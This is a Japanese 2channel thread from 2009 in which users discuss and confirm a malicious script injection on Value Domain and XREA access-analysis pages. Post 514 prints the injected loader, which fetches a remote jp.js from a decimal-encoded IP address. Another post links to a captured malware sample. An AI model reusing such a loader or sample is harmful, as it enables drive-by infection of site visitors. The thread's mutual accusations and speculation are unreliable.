レンタルアクセス解析サービス 謎のあやしい文字 & う ・・・
いまは、でない。気のせいだったのか・・・ 気のせいだったんだろうなぁ
でも、どこででたんだろう・・・ いまいち記憶が・・・

449:名無しさん@お腹いっぱい。
09/07/08 13:56:22 0
今のとこ実害報告ないけど、実際に実害報告出だしたらどう命名されるんだろ

DigiRoウイルス

かなぁ?

450:名無しさん@お腹いっぱい。
09/07/08 13:59:25 0
大阪ウィルスだろww

451:名無しさん@お腹いっぱい。
09/07/08 14:03:15 0
移管しようにも怖くてログインすらできんのだが…
ある程度の安全が確保されてから全移管する

452:名無しさん@お腹いっぱい。
09/07/08 14:19:20 0
>>451
全部一気に移管するならログインしても問題ないだろ
終わってしまえばもう関係ないんだからさ

453:名無しさん@お腹いっぱい。
09/07/08 14:35:39 0
俺も怖くてログインできないクチなんだよな…
入金したから、その申請をしたかったんだが…

正式なアナウンスしないつもりなのかな?

454:名無しさん@お腹いっぱい。
09/07/08 14:42:42 0
ある程度まとまった数のユーザーに実際の被害が出なけりゃこのまま黙殺だろ

被害が出たらそりゃ凄い事になりそうだけどなw

455:名無しさん@お腹いっぱい。
09/07/08 14:43:05 0
ソースは2ちゃんとか走りすぎじゃない?
何処も自身で確認した訳でもなく、そーすは2ちゃんって言ってるじゃん
しかも個人ブログとかどう信用しろっていうんだ

>>451
俺ログインしまくってるけど特になにもないよ

456:名無しさん@お腹いっぱい。
09/07/08 14:45:43 0
何か言う前に同一スレ内くらいざっと読めよ

457:名無しさん@お腹いっぱい。
09/07/08 14:46:10 0
仮に改竄時にパスを抜かれてたとしてだ、
現時点でコード削除されていて、再発していないということは、デジロ側で抜かれたパス変更してるはず。
なんで待ってないでさっさとログインしてパス変えちゃえば心配ないと考える。
むしろ何かされるの待ってる方がマゾ。

458:名無しさん@お腹いっぱい。
09/07/08 14:49:38 0
>>456
スレ全部読んだけど、上でも誰かいってたけど原爆ネタと同じ流れじゃん
魚拓も含めて。

459:名無しさん@お腹いっぱい。
09/07/08 14:50:18 0
前にxreaで運営しているネトゲサイトだかなんだかにスクリプト埋め込まれたのも同じ方法じゃないか?

あんときは http://1039045744:88/jp.js だったけど

xreaはこんときスクリプトの脆弱性をついたXSSって発表してるから今回もそうかね?
だとしたら間抜け以外の何モンでもないな

URLリンク(sb.xrea.com)

460:名無しさん@お腹いっぱい。
09/07/08 14:51:01 0
ミスリードにも程がある

461:名無しさん@お腹いっぱい。
09/07/08 14:52:00 0
コンタクトフォームで聞いたが、

--------------------------------------------------------------------
お世話になっております。

お問い合わせについてですが、先ほど問題無くログイン可能でございました。

セキュリティソフトなどの警告も無く、現状ではユーザー様から連絡いただいた症状を確認できませんでした。

ご確認の上、適宜ご作業いただければ幸いです。
---------------------------------------------------------------------

「現状ではユーザー様から連絡いただいた症状を確認できませんでした。」
と言う言葉を信じるなら、ガゼじゃないのか?
妬みを持つユーザーから

462:名無しさん@お腹いっぱい。
09/07/08 14:54:48 0
godaddyは以前クラックされてたよな。
FC2は安いしVDに近い操作ができそうだが、実際どうなのかな

463:名無しさん@お腹いっぱい。
09/07/08 14:58:21 0
こんな時に何だけど、ネームサーバ障害はやっぱり完全放置なんだよね?

464:460
09/07/08 15:01:29 0
サポートに質問してみたら速攻レスきて驚いた・・・

[2009-07-08 14:51:02] サポートからメッセージが追加されました。

お世話になっております。

お問い合わせについてですが、弊社にてサポート業務などにおいて数分単位でログインページは常時確認しております
が、ユーザー様よりご連絡いただいている「改竄」は確認できませんでした。

ご確認の上、適宜ご作業いただければ幸いです。

2ちゃんを信じるか公式のコメントを信じる最終的には個々の判断だけど
もし事実じゃないとしたら、いくら2ちゃんねるだからといって悪質にも程があると思う。
ミスリードに釣られて煽った人間も同罪。

465:名無しさん@お腹いっぱい。
09/07/08 15:02:35 0
魚拓はどうなの
怖くてみれない

466:名無しさん@お腹いっぱい。
09/07/08 15:04:54 0
>>465
スレの内容どおりだよ、マルウェアが仕込まれたjsファイルへのリンクが埋め込まれてる
ブラウザのjavascriptを切った状態でアクセスしてソースを確認すればいい

467:名無しさん@お腹いっぱい。
09/07/08 15:08:26 0
やはり、改竄はなかった。サポートが正式回答しているではないか。
他社工作員乙。捏造するにも程がある。いい加減にしろ。

468:名無しさん@お腹いっぱい。
09/07/08 15:13:06 0
firefox+Noscriptで魚拓見てきたけど
たしかにあったねs.jsっていうの
この魚拓URL見せたらなんて言うんだろう?

469:名無しさん@お腹いっぱい。
09/07/08 15:14:02 0
ソースのログインフォームの下あたりだよね

470:名無しさん@お腹いっぱい。
09/07/08 15:16:09 0
魚拓が捏造でしょ
デジロが正式アナウンスしない限り、他社工作員の捏造

471:名無しさん@お腹いっぱい。
09/07/08 15:19:40 0
改ざんされて被害にあったっていってたひとがふしあなで書き込むといいんじゃない?

472:名無しさん@お腹いっぱい。
09/07/08 15:20:31 0
捏造って流れで押そう! ってのがトレンドなんだw

473:名無しさん@お腹いっぱい。
09/07/08 15:21:27 0
ホメ殺しでしょ、極端なデジロ擁護で逆に反感を煽ってるんだよ

474:名無しさん@お腹いっぱい。
09/07/08 15:23:52 0
ははww
前スレ終盤あたりからだよねその流れww

475:名無しさん@お腹いっぱい。
09/07/08 15:23:53 0
極端なデジロ擁護っていうのがよくわからない

476:名無しさん@お腹いっぱい。
09/07/08 15:23:58 0
魚拓が捏造可能って話にしちゃうとそれはそれですごい面倒な話になる気がする

477:名無しさん@お腹いっぱい。
09/07/08 15:27:07 0
社員乙っていわれるようにレスしてんじゃないの
原爆の時みんなにスルーされてたやつじゃない?

478:名無しさん@お腹いっぱい。
09/07/08 15:27:35 0
魚拓がねつ造可能だと通報しろ。そっちの方が世間的には盛り上がるぞw

479:名無しさん@お腹いっぱい。
09/07/08 15:28:59 P
>>462
FC2は複数のドメイン管理で切り替えが必要な時点でクソ。
個人的にはムームーの方がよっぽど使いやすいレベル。


480:名無しさん@お腹いっぱい。
09/07/08 15:29:19 P
おれ、リアルタイムで人柱やった。当時、その追加されてるソースも確認した。
で、>>464の報告が事実だと仮定して、サポートが「確認できなかった」のが本当ならば、
仕掛けた本人が消したか、もしくはデジロックの担当部署が当該ソースを削除して、
サポートにその申し送りがされてないとしか考えられない。

とことん「改竄がなかった」ことにしたい輩がいるけれど、
俺から見れば、むしろそうやってうやむやにしたい奴のほうが悪質に見える。

>>473
その可能性はあるね。頭がおかしいとしか言いようがない。

481:名無しさん@お腹いっぱい。
09/07/08 15:33:49 0
自分で確認できなかった事と事実をなかったことにしろっていうのは違うだろ。
公式がないって言ってんのを名無しを信じろっていうほうが無理だろ

482:名無しさん@お腹いっぱい。
09/07/08 15:34:15 0
なかったことにしたい人が必死すぎてこわい

483:名無しさん@お腹いっぱい。
09/07/08 15:34:58 0
俺から見れば名無しで書き込んで、信じろっていうやつのほうが頭おかしいと思うが

484:名無しさん@お腹いっぱい。
09/07/08 15:35:42 0
>>480
お金を取って、ログまで残して回答してるのと、
2chのどっちを信るかろと言えば、前者だろ。

ちょっと考えれば、value-domainってlocalアドレスを
自分のPCで書き換えれば、URI付き魚拓なんて捏造いくらでもできるからな。

絶対ガセ

485:名無しさん@お腹いっぱい。
09/07/08 15:35:51 0
>>482
頭大丈夫?

486:名無しさん@お腹いっぱい。
09/07/08 15:36:06 0
名無しの問題じゃなくて、魚拓の信頼性だろ

487:名無しさん@お腹いっぱい。
09/07/08 15:36:48 0
どうせわざとやってんだから相手にすんなよ

488:名無しさん@お腹いっぱい。
09/07/08 15:38:47 P
>>481
そんなこと言うなら、
「公式がないって言ってる」という情報源だって名無しだろうが

489:名無しさん@お腹いっぱい。
09/07/08 15:40:23 0
急にP付で書き込んでてフイタw
恥を知れw

490:名無しさん@お腹いっぱい。
09/07/08 15:42:04 0
>>484
それ自分はだませるけど魚拓側のリゾルバはだませないだろ?

491:名無しさん@お腹いっぱい。
09/07/08 15:43:50 0
ガセを流した方々へ

コンタクトフォームで問い合わせしてるやしまで現れて、
デジロックは無駄な労力使ってる。

そろそろ許してやれよなーー

492:名無しさん@お腹いっぱい。
09/07/08 15:44:45 0
ActiveX…恐ろしい子っ!

493:名無しさん@お腹いっぱい。
09/07/08 15:44:54 0
>>490
localhost value-domain.com

でいいんでない?

494:名無しさん@お腹いっぱい。
09/07/08 15:45:39 P
>>481
まあいいや。
君が善意の第三者と仮定するなら、君の言い分も分からないではない。
ただソースをこの目で確認した俺からすれば、隠蔽工作をしているデジロックに
対して心底腹が立つ。

てか俺、完璧釣られてるのかな。

495:名無しさん@お腹いっぱい。
09/07/08 15:46:24 0
>>493
魚拓のコンテンツ取得って魚拓のサーバーがやってるんだから
ローカルのホスト情報関係ないと思ったんだけどそういう仕組みじゃないんだっけ?


496:名無しさん@お腹いっぱい。
09/07/08 15:46:29 0
>>493
魚拓サイトのサーバにそれをどうやって書き込むの?
自分のPCだけだよそれで騙せるのは

497:名無しさん@お腹いっぱい。
09/07/08 15:48:00 0
魚拓というアーカイバーか。なるほど。

498:名無しさん@お腹いっぱい。
09/07/08 15:48:17 0
被害にあったっていうならふしあなで書き込めばいいんじゃない?
そうすれば擁護の連中も信じるかもよ?

>おれ、リアルタイムで人柱やった。当時、その追加されてるソースも確認した。
>で、>>464の報告が事実だと仮定して、サポートが「確認できなかった」のが本当ならば、
>仕掛けた本人が消したか、もしくはデジロックの担当部署が当該ソースを削除して、
>サポートにその申し送りがされてないとしか考えられない。

499:名無しさん@お腹いっぱい。
09/07/08 15:48:27 0
>>494
ええ、釣られてると思いますよ

500:名無しさん@お腹いっぱい。
09/07/08 15:49:08 0
>>494
ヒント:現在勤務時間中

501:名無しさん@お腹いっぱい。
09/07/08 15:50:05 0
ID出れば社員がわかって便利なのに不便だな

502:名無しさん@お腹いっぱい。
09/07/08 15:52:13 0
お待ちかねの社員乙のタイミングですねw
わざわざご苦労さま

503:名無しさん@お腹いっぱい。
09/07/08 15:53:08 0
ガセ情報を流しているのは社員の方ですね

504:名無しさん@お腹いっぱい。
09/07/08 15:53:16 P
>>499-500
だよねぇ・・・。

>>498
べつにやってもいいけど、何の根拠にもならんだろ。
相手が善意の第三者でないなら尚更のこと。

505:名無しさん@お腹いっぱい。
09/07/08 15:55:31 0
意味がわからない・・・

506:名無しさん@お腹いっぱい。
09/07/08 15:57:04 P
いっそまちBBSとか、全員強制IPのところでやれば面白い。

507:名無しさん@お腹いっぱい。
09/07/08 15:57:37 O
まぁ、そのうちにドメイン乗っ取りが開始されれば、少しはここも静かになるわな。

508:名無しさん@お腹いっぱい。
09/07/08 15:57:52 0
WEB魚拓の中の人に連絡してみる
どっちかが捏造してるんだろ?それは罪を問われるべき

509:508
09/07/08 16:00:36 0
デジロの捏造だとしたら救いようない問題だし
WEB魚拓経由で捏造してウィルス撒いてるとしても問題
これは白黒つけるべき

510:名無しさん@お腹いっぱい。
09/07/08 16:01:34 0
ややこしくなるからお前もうでてくんなよ

511:名無しさん@お腹いっぱい。
09/07/08 16:01:49 P
あ、関係ないかもしれないけど、
今XREAのアクセスアナライザー URLリンク(ax.xrea.com)
のログイン画面で、アバスト反応した。
↓こんなんみたいだけど。
JS:CVE-2008-0015-A [Expl]
これって今回の騒動は関係ない?



512:名無しさん@お腹いっぱい。
09/07/08 16:03:09 0
>>511
ある! 同じjsが

513:名無しさん@お腹いっぱい。
09/07/08 16:04:14 0
うわ!マジで居る
見に行くならスクリプト切っていけよ

514:名無しさん@お腹いっぱい。
09/07/08 16:04:42 0
>>511

</head>タグのちょうどうえ

<SCRIPT LANGUAGE="JAVASCRIPT">
var js = document.createElement('script');
js.src ="http://1856317799:888/jp.js";
try {document.getElementsByTagName('head')[0].appendChild(js);}
catch(exp){}
js = null;
</SCRIPT>
</HEAD>


515:511
09/07/08 16:06:11 P
どうも。アバスト反応して、入る前にすぐ削除したけどびっくりしたわ。>>511
昨日の昼ぐらいまでは、こんなん反応しなかったハズ。

516:511
09/07/08 16:08:03 P
今もうPCの電源落としてアドエスからP2経由でレスしてるんで、
魚拓等必要あれば誰かたのんますー。

517:名無しさん@お腹いっぱい。
09/07/08 16:08:07 O
デジロ社員はこんなとこで遊んでないで…

とっととデジロウイルスの対策をしろよ

518:名無しさん@お腹いっぱい。
09/07/08 16:09:17 0
login.phpにあるの?今ソース確認中

519:名無しさん@お腹いっぱい。
09/07/08 16:09:26 0
IE使ってる人は要注意だなこりゃ

520:名無しさん@お腹いっぱい。
09/07/08 16:10:11 0
>>518
違う、>>511 をよく読め

521:名無しさん@お腹いっぱい。
09/07/08 16:10:15 0
この人病気なんかな・・・

522:名無しさん@お腹いっぱい。
09/07/08 16:10:57 0
value-domainの方は大丈夫だねさすがに

523:名無しさん@お腹いっぱい。
09/07/08 16:12:05 0
ログイン画面じゃなくてトップページじゃない?

524:名無しさん@お腹いっぱい。
09/07/08 16:12:58 0
なくなった…

525:名無しさん@お腹いっぱい。
09/07/08 16:13:36 0
トップページとログイン画面のソース見たけど
>>514に書かれてるやつなかったよ。別のページなのかな

526:名無しさん@お腹いっぱい。
09/07/08 16:14:11 0
たしかに貼られた直後見に行ったけど無かった
すでに消されてたのか?

527:名無しさん@お腹いっぱい。
09/07/08 16:14:16 0
まだ残ってるよ
いい加減なこと言うな

528:名無しさん@お腹いっぱい。
09/07/08 16:14:24 0
>>525
いやもうない

529:名無しさん@お腹いっぱい。
09/07/08 16:14:33 0
おいwふざけるのもいい加減にしろw
>>511みてすぐ行ったけど確認できなかったぞ!
釣られた俺が恥ずかしいだろうがあああああああああああああああ!www

530:名無しさん@お腹いっぱい。
09/07/08 16:15:53 0
自分も見つからなかったが、>>511が書き込まれた直後に対策されたか?
ソースチェッカーオンラインでは16:11にチェックされたキャッシュが残っていて、そこでは不正コードが確認できる
URLリンク(so.7walker.net)

(魚拓と違っていつまでこの不正コード入りキャッシュが残ってるかは不明


531:名無しさん@お腹いっぱい。
09/07/08 16:15:55 0
ある。ほぼ同じコードが入っている。jp.js

532:名無しさん@お腹いっぱい。
09/07/08 16:17:36 0
>>530のソースは確かに確認できた。
けどやはりアクセス解析の方はもう無いみたいだよ。

533:名無しさん@お腹いっぱい。
09/07/08 16:18:10 0
リアルタイムで改竄されてるの?

534:名無しさん@お腹いっぱい。
09/07/08 16:18:24 0
たった今消えたな
なんかついたり消えたりしてる?

535:名無しさん@お腹いっぱい。
09/07/08 16:18:30 0
いやはやなんともw
釣りじゃなくて本当にあったんだがもうなくなってるわ、少なくとも俺は確認できない

自分で見なきゃ信じられんのは俺も同じだから罵倒されてもしょうがないけど
やべぇ、ウィルスとかそんな問題より現状が面白くてしょうがないw

536:529
09/07/08 16:18:54 0
わろたwwwなんだこいつw

537:154
09/07/08 16:18:55 0
問い合わせてから2営業日経とうとしているがその後の回答が全く無い
ガセならガセでいいんだが、「改竄の事実はございません」の公式アナウンスがなぜできない!
技術に自信がないのか?ブランド信用力の低下が怖いのか?(今さら!)

VDとは6年近い付き合いだけど、今さっき全ドメイン移管手続きを執ったよ。。。

今回の件だけはVDのトップページで公式にアナウンスして欲しかった。
改竄の事実が無いなら「無い」と堂々と宣言できないVDには愛想が尽きたよ。

538:名無しさん@お腹いっぱい。
09/07/08 16:19:56 0
念のため全ページのソース見てきた。
今のとこはコード入ってないようだ。

539:名無しさん@お腹いっぱい。
09/07/08 16:20:23 0
16:17 の時点に wget で確認したけど、確かに混入してるね。
バランサで混入ありソースとなしソースが流れてるんじゃね?

540:名無しさん@お腹いっぱい。
09/07/08 16:20:25 0
魚拓のURLをよく見ろスキームはhttpsだ。
これがねつ造であるなら、SSLでなりすましが可能である事を示してる。


541:名無しさん@お腹いっぱい。
09/07/08 16:20:42 0
>>511
おもいっきり仕込まれてる。ソースで言うと62~68行目。
64行目に 1856317799:888/jp.js がある。

542:名無しさん@お腹いっぱい。
09/07/08 16:20:55 0
デジロック関連はしばらくスクリプト切ってアクセスしたほうがいいんじゃねえか


543:名無しさん@お腹いっぱい。
09/07/08 16:21:29 0
消えた。攻撃者がここ見ててひっこめたとかだと嫌だな。

544:名無しさん@お腹いっぱい。
09/07/08 16:22:23 0
それだと上げてるやつが一番怪しく思えるぞw
まーそんなことはないでしょ

545:539
09/07/08 16:23:13 0
こいつぜってー頭狂ってるw

546:名無しさん@お腹いっぱい。
09/07/08 16:23:14 0
ax.xrea.comは全部のページやられてるなw

547:名無しさん@お腹いっぱい。
09/07/08 16:23:31 0
>>539
うわ、まじだ

>Name: ax.xrea.com
>Addresses: 219.101.229.188, 219.101.229.189
前者に不正コード確認、後者はなし

URLリンク(219.101.229.188) (現時点で不正コード注意)

548:名無しさん@お腹いっぱい。
09/07/08 16:24:07 0
この板に社員が常駐して、問題があるたびに直しているとしか思えないな

549:名無しさん@お腹いっぱい。
09/07/08 16:24:22 0
魚拓がちょうど今メンテナンス中で取れないんだよなぁ

何が起こっているのかだけでも早く知りたいよ
アナウンスしろよVD

550:名無しさん@お腹いっぱい。
09/07/08 16:24:44 0
>>539が正解じゃないか?

551:名無しさん@お腹いっぱい。
09/07/08 16:24:48 0
>>539
ax.xrea.comは2台だな。
219.101.229.188 ←やられてる
219.101.229.189 ←やられてない

552:名無しさん@お腹いっぱい。
09/07/08 16:25:17 0
さっきからコードないないって書き込んでる奴だけど
>>547のURLでなら確認できた。

553:名無しさん@お腹いっぱい。
09/07/08 16:25:25 0
>>548
それはそれで対応してくれてるなら助かるけどさ
再アップロードしてはい直しました!って話だったらトルチョックかましたくなる

554:名無しさん@お腹いっぱい。
09/07/08 16:26:01 0
とりあえず、何度か取得してみたけど、あり・なしが落ちてくるね。

ありindex.html:11818 byte で CR+LF
なしindex.html:11310 byte で LF

diff は改行コード以外は 62~68 行目の SCRIPT だけだね。

555:名無しさん@お腹いっぱい。
09/07/08 16:26:11 0
>>547
専ブラで飛んじゃうような貼り方するなよ…

556:名無しさん@お腹いっぱい。
09/07/08 16:27:20 0
魚拓のメンテ終わるのと不正コード除去とどっちがはやいかな

>>555
すまん、以後http全部抜くわ


557:名無しさん@お腹いっぱい。
09/07/08 16:28:38 0
アクセス解析タグに仕込むことも出来るんじゃと思ったら
ぞっとした

558:名無しさん@お腹いっぱい。
09/07/08 16:28:40 0
ひょっすると社員も確認する術がなくて、ガセなんじゃ・・・とか思ってるのかもなww

たぶん、リアルタイムに罠貼ったり外したりしてるw
俺は、7月5日の夜中にwikiwiki.jpの方でトロイphp仕込まれてるのみたけど、
5分後には、なくなってたりとか、管理人が削除したにしては、やけに対応が早いなとは思った。

559:名無しさん@お腹いっぱい。
09/07/08 16:29:50 0
踏んできた。一発でヒット URLリンク(www1.axfc.net) dlkey: dxvwvd

560:名無しさん@お腹いっぱい。
09/07/08 16:30:13 0
バレる前に削除して、定期的にパスを抜いてんだろうな
よくよく考えるとかなり深刻じゃないか?

561:名無しさん@お腹いっぱい。
09/07/08 16:31:09 0
>>445
「個人情報の取り扱いについて」で
>ユーザー登録時に申請された情報は一切公開されません。当データベースサーバー内に保存され、厳重に保管されます。
>自動課金等のオプションをお客様が選択される場合、クレジットカード情報が当サーバーに保存されます。それらの情報は当データベースサーバー内で暗号化・保存され、厳重に保管されます。
とはあるけど、果たして罰せられるのかねえ

「責任の限界について」で>>141に加えて
>あらゆるユーザーデータの操作処理
もあると思ったけど、不正アクセスは操作処理ではなく通常の管理だから違うのか

>あらゆる非常事態が発生したことによる損失
今回のことが非常事態といえるのか
>あらゆる原因によって起こるドメインネーム登録の未完了、不可、損失
あらゆる原因に法的例外とかはないのか

とここまで考えて思ったんだけど。。。

562:名無しさん@お腹いっぱい。
09/07/08 16:32:03 0
責任の限界もなにも通常業務レベルでセキュリティ対策は必須事項っすよ

563:名無しさん@お腹いっぱい。
09/07/08 16:33:32 0
でも不正コード削除してもログは残るんじゃないの?
内部の人が書き換えてるじゃなければ、分かりそうなもんだよね?

564:名無しさん@お腹いっぱい。
09/07/08 16:33:38 0
これやばいだろ…

565:名無しさん@お腹いっぱい。
09/07/08 16:35:14 0
ここのアクセス解析使ってるとこたくさん見るから
やばいんじゃないかな…さすがに。

566:名無しさん@お腹いっぱい。
09/07/08 16:35:50 P
>>561
法律家じゃないから根拠法とかわからんけど、消費者保護の観点から消費者に著しく不利な契約は無効とかじゃなかった?
果たすべき管理責任を果たさないことにより利用者が損害を受けた場合は当然賠償責任が発生すると思うけど。

567:名無しさん@お腹いっぱい。
09/07/08 16:36:01 0
value-domainならまだ利用者数はそれほどでもないだろうけど
xreaとなると話はだいぶ違ってくるね

568:名無しさん@お腹いっぱい。
09/07/08 16:36:17 0
魚拓が改鼠されているとかいうとんでも理論をデジロックが発表するのに期待・・・
と思ったらxreaにも仕込まれてたか、どうみてもデジロックやられてるだろw

569:名無しさん@お腹いっぱい。
09/07/08 16:36:43 P
アクセス解析のサーバーとバリュドメのサーバーは別だよね。
デジロ関係が軒並み侵入されてるってこと?

>>563
同意。

570:名無しさん@お腹いっぱい。
09/07/08 16:37:31 0
いつ改竄されたのかヘッダ見ようと思ったらこれ動的に生成してるのね。
>>554 index.htmlは存在しない。index.php。
このサーバのPHPの出力に全部くっついてくる気がする。

571:名無しさん@お腹いっぱい。
09/07/08 16:39:10 0
>>570
あぁ、すまん。そういやそうだね。

572:名無しさん@お腹いっぱい。
09/07/08 16:39:13 0
こうなると次はXREAかCOREのadmin.cgiにも仕組まれるのかな

jsの中身見たら不正コードに混じって忍者TOOLS提供の
アクセスカウンタのコードが入っていて憎たらしいと思った

573:名無しさん@お腹いっぱい。
09/07/08 16:39:49 0
いつものコピペの事務員レベルじゃ状況把握出来てないっぽいな。終わってる。
すべてのphpスクリプトの安全宣言出るまで使えないでしょ。

574:名無しさん@お腹いっぱい。
09/07/08 16:42:05 0
規約の法的拘束力って限界あるよね

電子商取引等に関する準則
?目次? 第1.オンライン取引_
5(3) なりすましを生じた場合の認証機関の責任
URLリンク(74.125.155.132)

575:名無しさん@お腹いっぱい。
09/07/08 16:42:19 0
>セキュリティベンダーなどの公開情報によれば、この脆弱性を悪用した攻撃コードは既に広範囲に仕掛けられた形跡があり、日本のサイトも含まれるという。
URLリンク(internet.watch.impress.co.jp)

今回の事と関係なし?

576:名無しさん@お腹いっぱい。
09/07/08 16:42:23 0
こんなに自在に書き換えできるんなら、よっぽど管理者を馬鹿にしてないかぎり、足跡消すはず

で、公式発表は、改ざんはないんだっけ? どうなの、これ

577:名無しさん@お腹いっぱい。
09/07/08 16:42:56 P
XREAとかにFTPのログインしても大丈夫なんだろうか

578:名無しさん@お腹いっぱい。
09/07/08 16:43:19 0
忍者のアクセスカウンタだと…?

579:名無しさん@お腹いっぱい。
09/07/08 16:43:35 0
>>575
いやそのものずばりだよ。

580:名無しさん@お腹いっぱい。
09/07/08 16:43:40 0
お問い合わせについてですが、弊社にてサポート業務などにおいて数分単位でログインページは常時確認しております
が、ユーザー様よりご連絡いただいている「改竄」は確認できませんでした。

581:名無しさん@お腹いっぱい。
09/07/08 16:44:03 0
今回のはjpgに仕組まれてるのが怖いな

582:名無しさん@お腹いっぱい。
09/07/08 16:44:26 0
gifとswfにも入ってるよ

583:名無しさん@お腹いっぱい。
09/07/08 16:45:19 0
VALUE DOMAIN サービス利用規約には
準拠法、管轄裁判について
当規約には日本法が適用されます。また、当規約、当サービスに関わる一切の紛争は、大阪地方裁判所の専属管轄とします。
とある
大阪地裁だから
Yahoo! BB顧客情報漏洩事件
URLリンク(ja.wikipedia.org)

584:名無しさん@お腹いっぱい。
09/07/08 16:47:00 0
>>579
サンクス そのものずばりですか・・・

585:名無しさん@お腹いっぱい。
09/07/08 16:48:24 0
>>578
いじり中ですかw
pdfとswfとmsvidctlスクリプト、および降ってくるexeについては
ベンダーにも送ってあるしセキュ板にもアップしてあります。

586:名無しさん@お腹いっぱい。
09/07/08 16:50:01 0
降ってくるexe、一応カスペルスキーだと処理してくれるね
他は知らんけど

587:名無しさん@お腹いっぱい。
09/07/08 16:50:56 0
>>575
先月からIEから火狐に乗り換えておいてよかった…本当によかった…

588:名無しさん@お腹いっぱい。
09/07/08 16:52:11 0
>>265で報告したのに


589:名無しさん@お腹いっぱい。
09/07/08 16:53:31 0
改ざんがないってことは、自分でやってんじゃね?

590:名無しさん@お腹いっぱい。
09/07/08 16:57:15 0
社員のいたずらだったりしてw


591:名無しさん@お腹いっぱい。
09/07/08 16:57:28 0
2ちゃんねるの情報なんて参考にならない
すべて捏造で壮大な釣りかもしれない

592:名無しさん@お腹いっぱい。
09/07/08 16:59:28 0
>>591
2chでも嘘を書けば逮捕されるのでそれはない

593:名無しさん@お腹いっぱい。
09/07/08 16:59:39 0
ユーザー様よりご連絡いただいている「改竄」は確認できませんでした。

594:名無しさん@お腹いっぱい。
09/07/08 17:01:01 0
魚拓って改ざんされないの?

595:名無しさん@お腹いっぱい。
09/07/08 17:01:53 0
URLリンク(www.avertlabs.com)
大阪辺りの赤丸は…

596:名無しさん@お腹いっぱい。
09/07/08 17:02:57 0
このスレは以下の五大勢力で構成されています

混乱させようと、改竄はないと嘘を言ってるヤツ:1人(>>580とかそのへん)
改竄を目の当たりにしたヤツ:数人
怖くて確認できないけど心配してるヤツ:多数
リアルタイムで弄ぶ改竄クラッカー:1人
デジロ工作員:数人

597:名無しさん@お腹いっぱい。
09/07/08 17:03:47 0
>>596
お前はどれ?

598:名無しさん@お腹いっぱい。
09/07/08 17:04:51 0
降ってくるexeって何?

599:名無しさん@お腹いっぱい。
09/07/08 17:04:55 0
俺はガンダムだ

600:名無しさん@お腹いっぱい。
09/07/08 17:05:02 0
改竄を目の当たりにしたヤツじゃないと信じられない流れだろ

601:名無しさん@お腹いっぱい。
09/07/08 17:05:07 0
>>597
俺はlogin.phpの改竄を目の当たりにした人間

602:名無しさん@お腹いっぱい。
09/07/08 17:05:59 0
アクアナは現時点で確認できるでしょ?>>600

603:名無しさん@お腹いっぱい。
09/07/08 17:07:07 0
>>602
いや俺は一番浮かれてたバカだよ、書き込み後に真っ先に見た

604:名無しさん@お腹いっぱい。
09/07/08 17:07:46 0
5月末からのネームサーバ大障害の放置も捏造でプッシュするのかな?

605:名無しさん@お腹いっぱい。
09/07/08 17:07:51 0
jsをオフにして、アクロバットリーダーとフラッシュプレイヤーを最新にして、
fix itとか言う奴をやっとけば大丈夫?

606:名無しさん@お腹いっぱい。
09/07/08 17:08:20 0
>>598
exeがPCにいつのまにかDLされてくる
何も表示ないし、隠しフォルダにはいってくるからレジストリみてないとわからんかもしれんけど
普通はセキュリティソフトが防ぐから、ノーセキュリティのときのみだが

607:名無しさん@お腹いっぱい。
09/07/08 17:08:36 0
VDもアレだが、そもそもVD狙って改竄してる奴は誰なんだ?

608:名無しさん@お腹いっぱい。
09/07/08 17:09:53 0
>>606
ありがとう。

昨日アクアナにカスペが反応したときはビビッた。

609:名無しさん@お腹いっぱい。
09/07/08 17:09:57 0
こうなってくると去年の改竄さわぎもデジロの説明じゃ納得できんな
スクリプトの脆弱性なのか、それともサーバの脆弱性なのか
サーバの脆弱性だったらレンサバの方も危ない

610:名無しさん@お腹いっぱい。
09/07/08 17:10:09 0
exeはキーロガーっぽいけど
ログインパスだけじゃないよな。どこまで狙ってるんだろ

611:名無しさん@お腹いっぱい。
09/07/08 17:10:57 0
結局1年経っても何の対応もしてないよな。

612:名無しさん@お腹いっぱい。
09/07/08 17:11:10 0
アクアナ関連はxrea絡みだからxreaスレでやれば?
2スレが噴いた方が捏造煽りの子も喜ぶんじゃね?

613:名無しさん@お腹いっぱい。
09/07/08 17:12:04 0
アクアナは専用スレがあったはず

614:名無しさん@お腹いっぱい。
09/07/08 17:13:24 0
>>613
【アクセス解析】AccessAnalyzer.com Part5【XREA】
スレリンク(hp板)


615:名無しさん@お腹いっぱい。
09/07/08 17:13:58 0
本来はサポートフォーラムでやった方がいいんだけどね

616:名無しさん@お腹いっぱい。
09/07/08 17:14:18 0
login.php のソース読んだ限りぜんぜん問題なさそうだが?
js自体ほとんど使ってないし
なにが問題なんだ?

617:名無しさん@お腹いっぱい。
09/07/08 17:14:57 0
ブラウザからダウンロードするのって、かならずダウンロード前にウィンドウが出たり、上のバーがでるもんだと思ってた
セキュリティホールつくと本当になにも表示されないんだな、気がついたらDLされてて驚いた
勉強になったわ

618:名無しさん@お腹いっぱい。
09/07/08 17:14:58 0
あんまり情報が分散すると、見るのがたいへんというのもあるんだよね。

619:名無しさん@お腹いっぱい。
09/07/08 17:15:10 0
ソースを読めても日本語読めないのかよ

620:名無しさん@お腹いっぱい。
09/07/08 17:15:24 0
実質的にここがデジロック総合スレだと思ってたわ

621:名無しさん@お腹いっぱい。
09/07/08 17:16:04 0
>>614
2分でスレ拾ってくるとは仕事が速いねw

いや、前から知ってるけどそれ製作板だよね?
xrea系列のサービスなんだからxreaスレでやりゃいいじゃん。
その方がいつもの捏造煽りの子も同板内で2ヶ所同時にスレ噴いて楽しめるから良いかなと。

622:名無しさん@お腹いっぱい。
09/07/08 17:16:05 0
>>617
降ってくるexe?
どこにダウンロードされるの?
ファイル名教えて。

623:名無しさん@お腹いっぱい。
09/07/08 17:16:24 0
問題のところr開いて、ソース見たけど、中身が何もない
でもexeはDLされて、カスペルスキーが反応する。これどういう技術? 怖いんだけど

624:名無しさん@お腹いっぱい。
09/07/08 17:18:08 0
IE使ってないけどなんかこわいからFix itしてきた

625:名無しさん@お腹いっぱい。
09/07/08 17:18:10 0
>>621
その趣旨なら、複数の板で騒いだ方がいいんじゃね?
でも、オレは分散するとめんどくさい派

626:名無しさん@お腹いっぱい。
09/07/08 17:19:27 0
カスペルスキーとアバストの報告はあるし、ノートンは対応してるらしいよね、告知では。

ウイルスバスターはどう?

627:名無しさん@お腹いっぱい。
09/07/08 17:20:46 0
>>625
だな。
先に行って待ってりゃデジロ社員共々やって来るだろうからそうするわ。

628:名無しさん@お腹いっぱい。
09/07/08 17:21:56 0
>>607
